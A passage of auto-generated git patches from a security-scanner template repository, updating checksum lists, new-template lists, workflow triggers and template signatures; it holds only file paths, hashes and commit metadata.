-http/technologies/wordpress/plugins/the-events-calendar.yaml:8483d26cba10a4a6d15dbbec5bbf7f19b869f989 +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e +http/technologies/wordpress/plugins/svg-support.yaml:9e209af3c91abf6ba27d6d2b49ddf7196dc91450 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 +http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 +http/technologies/wordpress/plugins/templately.yaml:2b4d2d3c2706a8736bd848f882e18bb587689859 +http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:2aca70dd97209fb3418802d6da5a7a0e05a3cfbf -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:a89b380832f8fc41a0e0c1c1abe638d9f5380540 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:35a4d072c91b0911cc0f1dc036ca917ad617bebb -http/technologies/wordpress/plugins/under-construction-page.yaml:08cdd5081efbd925fa30dec8c6a186c12df4529b +http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 +http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:c4f408339c20b62a11bc18725492931971323608 +http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:b1a851f0370dc1bae6bbd7276e39dcb65f431092 +http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:fb8c21b66597b7a56b49a78ebfdc2c2de98dbf50 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:f7675db4a92bbe9ecf4cabb7bc085d923709f2ae -http/technologies/wordpress/plugins/webp-express.yaml:92c5d0d6bc37f19def2c4260f5956fe2fc31a992 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ccb63ea0671e986dfa96949574d24273656157f1 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:c8385f3b19ded2548aac6f5d33db3c439964f6b1 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:5a9659e864c532e9578a86555805d8aa06f2f5ee -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:6a43deeab0149b961f526a4eeeefc4d3046d0e7f +http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 +http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:48a2dfbd0468c709aab34180039627de6a59c4fc -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:3276dbb5e99b1dc3a5c0d40ad993be6815ace739 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:5a11aa25b3472c2ab8c6518d5941a86837b53c6f -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:ac8a026cda35d0d4d78c2dc7b2815e5becd1284e -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:9d9e1217003abdc21365b9351c23a983d4602705 -http/technologies/wordpress/plugins/woocommerce-services.yaml:fff278ffac815bb8c009c2d7c1121270ffbb65b8 -http/technologies/wordpress/plugins/woocommerce.yaml:f0381d3af7f9200dd4e85a0b279e3261b2cb84c5 -http/technologies/wordpress/plugins/wordfence.yaml:2f60a9ffd6daa8c3958e5d63ca8486b804ed2427 -http/technologies/wordpress/plugins/wordpress-importer.yaml:02b01d10ea43ea44c3ad6376e06d65c2b38a0bc1 -http/technologies/wordpress/plugins/wordpress-seo.yaml:b11fd85c7f0f36a67a54868fe7fe68b6c71e3695 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:b2a01f711495d5a37d201b510a6487ae816dab9b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b +http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 +http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f +http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b +http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f +http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:dd6b0df8ae4e459b81bf47cf1087138f8b662344 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ced04026f2fe44d9b2567a5ec5f5fa882e3ba3ae -http/technologies/wordpress/plugins/wp-file-manager.yaml:b3d4b240b0990c6c23db625c10645c3104932c8c -http/technologies/wordpress/plugins/wp-google-maps.yaml:dda40c6e76e56f4b136da09ee74c7302b4fb7fc4 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:f4873b9b95df09c0a73d39588b64e24cc43aa321 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:64dd98d57010c809599e50767b29fc2c4608dcde -http/technologies/wordpress/plugins/wp-migrate-db.yaml:a55bbfb124b5d70262230053ec16e06ec5d746c2 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:9c775cba0d2d668b35b3aec7d4d5a805407f1ca7 -http/technologies/wordpress/plugins/wp-optimize.yaml:258735479f7bc255949ce2e339232e25bb8b8b66 -http/technologies/wordpress/plugins/wp-pagenavi.yaml:f9e45464e77dc8d067757cb8383d1be75648b1e8 -http/technologies/wordpress/plugins/wp-reset.yaml:64d33fd1ea4833aa90afe954f84849c811857759 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:0852d8fec3e412fa1bf18019dcf967b2154859a1 -http/technologies/wordpress/plugins/wp-rollback.yaml:3a75d3303ff7998108e75ac352aaab6a51b67d1d -http/technologies/wordpress/plugins/wp-seopress.yaml:5e6640b4d577e3d43827e0cbc20011c4725b6bf6 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:7d6e53e8b59438726618ff0a6e778ea0e07bfe03 -http/technologies/wordpress/plugins/wp-smushit.yaml:e8b60d00252cc12a062b205acc016cb0f1a2e581 -http/technologies/wordpress/plugins/wp-statistics.yaml:1d534a900ff9d617762f6fb60654e85067ae0ccd -http/technologies/wordpress/plugins/wp-super-cache.yaml:0bd088bf00c6984f950af950a047f3bd5d3315b7 +http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 +http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 +http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 +http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec +http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 +http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc +http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca +http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 +http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb +http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b +http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:e46903d5d3fb1bce6a67028aba50689a29d15742 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:80dfc74700cd02c1020f981cf25158009db8a478 -http/technologies/wordpress/plugins/wpforms-lite.yaml:4e33526f7ebd217fd677c760f99acaa61a2c2ef4 -http/technologies/wordpress/plugins/wps-hide-login.yaml:b5cd4fdc5d01fdf3007584ac6d924eea9444e629 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c542d9d2ef2ca3ec90f2d9816ea35d690c1e2735 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb +http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:f5eff7bd3cc8b3c5e361b1acef280d0a0e88d9ca +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8853,7 +8854,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:dc7065a5e6462f090625c4babda8ce05ae4ce9f3 +templates-checksum.txt:412b86a53c616c10a0440b5480ebbf31e85af2ea wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 91f78cb0e1ce1ed159c852f2223adb0a730c1204 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 10 Jul 2024 06:02:46 +0000 Subject: [PATCH 1034/1841] Auto Generated New Template Addition List [Wed Jul 10 06:02:46 UTC 2024] :robot: --- .new-additions | 3 +++ 1 file changed, 3 insertions(+) diff --git a/.new-additions b/.new-additions index 5c64ad48f2..6dc3afb8ae 100644 --- a/.new-additions +++ b/.new-additions @@ -51,14 +51,17 @@ http/misconfiguration/installer/subrion-installer.yaml http/misconfiguration/label-studio-signup.yaml http/misconfiguration/laragon-phpinfo.yaml http/misconfiguration/seq-dashboard-unath.yaml +http/technologies/apache/apache-cloudstack-detect.yaml http/technologies/apache/apache-pinot-detect.yaml http/technologies/neo4j-neodash-detect.yaml http/technologies/wordpress/plugins/chaty.yaml http/vulnerabilities/backdoor/polyfill-backdoor.yaml +http/vulnerabilities/hjsoft/hjsoft-hcm-tb-sqli.yaml http/vulnerabilities/jinhe/jinhe-oa-c6-upload-lfi.yaml http/vulnerabilities/next-js-cache-poisoning.yaml http/vulnerabilities/other/azon-dominator-sqli.yaml http/vulnerabilities/other/bagisto-csti.yaml http/vulnerabilities/other/crocus-lfi.yaml +http/vulnerabilities/other/pingsheng-electronic-sqli.yaml http/vulnerabilities/other/sharp-printers-lfi.yaml javascript/enumeration/ldap/ldap-metadata.yaml From e076c51e91594b762d3c7bf6d5d0752a8ded9cb2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Jul 2024 06:03:43 +0000 Subject: [PATCH 1036/1841] Auto Generated Templates Checksum [Wed Jul 10 06:03:43 UTC 2024] :robot: --- templates-checksum.txt | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index d4fdb2fcfc..bb96c205e0 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -7849,6 +7849,8 @@ http/vulnerabilities/hikvision/hikvision-fastjson-rce.yaml:02a334888358c47036d90 http/vulnerabilities/hikvision/hikvision-ivms-file-upload-bypass.yaml:bc54a4c9f7771c524140f1840157c03bf4651a54 http/vulnerabilities/hikvision/hikvision-ivms-file-upload-rce.yaml:94de4453e34e7b36379a10dc4966aa54f3582aeb http/vulnerabilities/hikvision/hikvision-js-files-upload.yaml:cdcf6ca5518af130ebd36c1531365f6bb79001c5 +http/vulnerabilities/hjsoft/hjsoft-hcm-sqli.yaml:b519d9b8bf96070aca19973c7e9f0f7c9ff7e2ae +http/vulnerabilities/hjsoft/hjsoft-hcm-tb-sqli.yaml:f75663ae56be567e6a21e3488413d54ec63f1814 http/vulnerabilities/httpbin/httpbin-open-redirect.yaml:1b66933da5367fcad1de79ed46e41dd9b6b4543a http/vulnerabilities/httpbin/httpbin-xss.yaml:b8072d3dcf45a6ca85ef27483281733357126da7 http/vulnerabilities/huatian/huatian-oa-sqli.yaml:f4f35ad79e01a4fde957a9c16e13167c085e0341 @@ -8153,6 +8155,7 @@ http/vulnerabilities/other/phpok-sqli.yaml:47a8896d38eb3940ee773e0f053e00a4d28c6 http/vulnerabilities/other/phpwiki-lfi.yaml:37fa61e3fc028ebe9d2996fbdf38cd6015264740 http/vulnerabilities/other/phuket-cms-sqli.yaml:120bcd9d748d32a71eab7b77f98969e3fc797aae http/vulnerabilities/other/phuket-cms-xss.yaml:a66543f506ca15df59732da947df46ebe7773634 +http/vulnerabilities/other/pingsheng-electronic-sqli.yaml:cd26a813b0d1f691c5b7889080ab9875b7ffb5c0 http/vulnerabilities/other/pmb-directory-traversal.yaml:3edd65226116e222366fb702f21ea383bd6a36a0 http/vulnerabilities/other/pmb-local-file-disclosure.yaml:a98bdbfe2c304c27096a31febde9927d89073c1b http/vulnerabilities/other/pmb-sqli.yaml:a8b2c7246901ec38ea0a9685c51d04c6faa4a2ca @@ -8854,7 +8857,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:412b86a53c616c10a0440b5480ebbf31e85af2ea +templates-checksum.txt:91772ccc7bbd9213f4c7abb38dffd3993a75ec28 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From a57d421c842c4d474337c5519be88a55016e233e Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 10 Jul 2024 06:03:47 +0000 Subject: [PATCH 1037/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 81aa5f9eda..88000cfc7b 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -56,15 +56,18 @@ on: - 'http/misconfiguration/label-studio-signup.yaml' - 'http/misconfiguration/laragon-phpinfo.yaml' - 'http/misconfiguration/seq-dashboard-unath.yaml' + - 'http/technologies/apache/apache-cloudstack-detect.yaml' - 'http/technologies/apache/apache-pinot-detect.yaml' - 'http/technologies/neo4j-neodash-detect.yaml' - 'http/technologies/wordpress/plugins/chaty.yaml' - 'http/vulnerabilities/backdoor/polyfill-backdoor.yaml' + - 'http/vulnerabilities/hjsoft/hjsoft-hcm-tb-sqli.yaml' - 'http/vulnerabilities/jinhe/jinhe-oa-c6-upload-lfi.yaml' - 'http/vulnerabilities/next-js-cache-poisoning.yaml' - 'http/vulnerabilities/other/azon-dominator-sqli.yaml' - 'http/vulnerabilities/other/bagisto-csti.yaml' - 'http/vulnerabilities/other/crocus-lfi.yaml' + - 'http/vulnerabilities/other/pingsheng-electronic-sqli.yaml' - 'http/vulnerabilities/other/sharp-printers-lfi.yaml' - 'javascript/enumeration/ldap/ldap-metadata.yaml' workflow_dispatch: From cf06a24b416e17f1d8e615f3effc0196b75e608e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Jul 2024 06:04:24 +0000 Subject: [PATCH 1038/1841] Auto Template Signing [Wed Jul 10 06:04:24 UTC 2024] :robot: --- http/technologies/apache/apache-cloudstack-detect.yaml | 1 + http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + http/technologies/wordpress/plugins/chaty.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/hostinger.yaml | 1 + http/technologies/wordpress/plugins/image-optimization.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/metform.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/simple-history.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/templately.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + 